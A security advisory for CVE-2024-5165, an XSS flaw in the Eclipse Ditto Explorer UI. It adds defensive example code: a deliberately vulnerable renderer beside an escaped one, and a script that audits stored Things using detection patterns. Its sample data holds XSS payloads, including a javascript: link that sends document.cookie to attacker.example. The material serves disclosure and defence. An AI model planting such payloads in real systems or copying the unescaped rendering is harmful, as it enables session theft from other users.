Eclipse · Eclipse Ditto · CVE-2024-5165
**Name of the Vulnerable Software and Affected Versions**
Eclipse Ditto versions 3.0.0 through 3.5.5
**Description**
Several input fields of the Eclipse Ditto Explorer User Interface (the web UI shipped with Ditto) did not properly neutralize user input, so the UI was vulnerable to both Reflected and Stored Cross-Site Scripting (XSS). Some of these inputs are not persisted at the Ditto backend but only in the browser's local storage, which yields a Reflected XSS: the injected content never reaches the server. Other inputs are persisted at the Ditto backend, which yields a Stored XSS: an authenticated and authorized user can persist a Thing in Ditto that carries script content, and that script executes in the browser of every other user who views the Thing in the Explorer UI. The data is stored as ordinary Thing content, so the flaw lies in how the UI renders it, not in the backend's acceptance of it.
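The rendering mistake the description refers to, as an added illustration (this is example code, not Eclipse Ditto's Explorer UI source): a hypothetical attribute table for a Thing, built once by splicing raw values into markup, which is the vulnerable pattern, and once with HTML output encoding applied first. The Thing document, the attribute names and the payload are constructed for the example.

```javascript
// Added example (not Eclipse Ditto code): a hypothetical Explorer-style view
// that renders a Thing's attributes to HTML. renderAttributesUnsafe() splices
// raw values into markup, the pattern behind a Stored XSS; renderAttributesSafe()
// applies HTML output encoding first. Runs under Node.js without a browser.

// Constructed sample Thing, shaped the way an authenticated user could persist
// it through the Ditto API. The "location" attribute carries the payload.
const SAMPLE_THING = {
  thingId: "org.example:sensor-1",
  attributes: {
    manufacturer: "ACME & Co <sensors>",
    location: '<img src=x onerror="alert(document.cookie)">',
  },
};

// Vulnerable: attribute keys and values are concatenated verbatim, so any HTML
// stored in the Thing becomes part of the DOM of every user who views it.
function renderAttributesUnsafe(thing) {
  let html = `<h2>${thing.thingId}</h2><table>`;
  for (const [key, value] of Object.entries(thing.attributes)) {
    html += `<tr><td>${key}</td><td>${String(value)}</td></tr>`;
  }
  return html + "</table>";
}

// Hardened: encode the five characters that can change meaning in an HTML
// text or quoted-attribute context before the value reaches the markup.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

function renderAttributesSafe(thing) {
  let html = `<h2>${escapeHtml(thing.thingId)}</h2><table>`;
  for (const [key, value] of Object.entries(thing.attributes)) {
    html += `<tr><td>${escapeHtml(key)}</td><td>${escapeHtml(value)}</td></tr>`;
  }
  return html + "</table>";
}

// Detector for the demo payload only: a literal <img ...> tag with an onerror
// handler. It shows the difference between the two renderers; it is not a filter.
function containsActiveMarkup(html) {
  return /<img\b[^>]*\bonerror=/i.test(html);
}

console.log("unsafe:", renderAttributesUnsafe(SAMPLE_THING));
console.log("safe:  ", renderAttributesSafe(SAMPLE_THING));
```

In a real browser UI the better choice is to avoid assembling markup from strings at all and to set text through `textContent` or build nodes with `createElement`; encoding as above is the fallback when a string of HTML has to be produced. Encoding covers text and quoted-attribute contexts only; a value that ends up in a URL (`href`, `src`) or in an event handler needs context-specific handling on top, and the test of any fix is the rendered DOM, not the string.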
**Recommendations**
For Eclipse Ditto versions 3.0.0 through 3.5.5, update to a release newer than 3.5.5 (3.5.6 or later), in which the affected inputs are properly neutralized and the Reflected and Stored XSS are fixed.
As a temporary workaround, restrict access to the Eclipse Ditto Explorer User Interface to a trusted set of users, or take it offline until the update is applied. The injected content only executes when the UI displays it, so limiting who can open the UI limits both who can plant a payload and who can be hit by one.
Avoid using the vulnerable input fields in the Explorer User Interface until the issue is resolved, and treat Things created by other users as untrusted: a payload persisted before the upgrade stays in the backend and will still execute in any browser running a vulnerable UI version, so review existing Things for script content as part of the remediation.
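A way to act on that last point, as an added example that is not part of Eclipse Ditto or of the advisory: an audit pass over Thing documents (here a constructed array, such as one page of results fetched from the Ditto search API) that reports the JSON-pointer path of every string in a Thing's attributes or features that looks like HTML or script. The detection patterns are heuristic assumptions; tune them to your data and expect some false positives.

```javascript
// Added example (not Eclipse Ditto code): audit persisted Things for values
// that would execute if rendered by a vulnerable Explorer UI. Input is an
// array of Thing JSON documents; output maps thingId to the JSON-pointer
// paths of suspicious strings. Heuristic patterns, assumed not exhaustive.

const SUSPICIOUS = [
  /<\s*[a-z!\/]/i,       // opening tag, closing tag or comment
  /javascript\s*:/i,     // script URL scheme, e.g. in href
  /\bon[a-z]+\s*=/i,     // inline event handler such as onerror=
  /&#x?[0-9a-f]+;/i,     // numeric entity, often used to disguise the above
];

function looksLikeMarkup(value) {
  return SUSPICIOUS.some((re) => re.test(value));
}

// Depth-first walk over a JSON value; returns RFC 6901 JSON-pointer paths of
// every string (key or value) that trips one of the patterns.
function findMarkup(node, path = "", hits = []) {
  if (typeof node === "string") {
    if (looksLikeMarkup(node)) hits.push(path);
  } else if (Array.isArray(node)) {
    node.forEach((item, i) => findMarkup(item, `${path}/${i}`, hits));
  } else if (node && typeof node === "object") {
    for (const [key, value] of Object.entries(node)) {
      const token = key.replace(/~/g, "~0").replace(/\//g, "~1"); // pointer escaping
      if (looksLikeMarkup(key)) hits.push(`${path}/${token}`);     // keys get rendered too
      findMarkup(value, `${path}/${token}`, hits);
    }
  }
  return hits;
}

// Audit one batch of Things. The walk is limited to attributes and features,
// the free-form parts of a Thing (assumption: extend it if your UI displays
// other fields as well).
function auditThings(things) {
  const report = {};
  for (const thing of things) {
    const hits = findMarkup({ attributes: thing.attributes || {}, features: thing.features || {} });
    if (hits.length > 0) report[thing.thingId] = hits;
  }
  return report;
}

// Constructed sample batch: two Things carrying payloads, one clean.
const SAMPLE_THINGS = [
  {
    thingId: "org.example:sensor-1",
    attributes: { manufacturer: "ACME Sensors GmbH", location: '<img src=x onerror="alert(1)">' },
    features: { temperature: { properties: { value: 21.5, unit: "C", label: "<svg onload=alert(1)>" } } },
  },
  {
    thingId: "org.example:gateway-7",
    attributes: { firmware: "2.4.1", notes: 'Click <a href="javascript:fetch(\'https://attacker.example/\'+document.cookie)">here</a>' },
  },
  {
    thingId: "org.example:clean-2",
    attributes: { name: "Hall sensor", description: "Measures a & b" },
    features: { relay: { properties: { state: "on" } } },
  },
];

console.log(JSON.stringify(auditThings(SAMPLE_THINGS), null, 2));
```

Run the report against a dump of all Things before upgrading and again afterwards; a hit is a value to inspect and, where it is an attack payload, to remove together with a look at who wrote it and when, since the author is by definition an authenticated and authorized user.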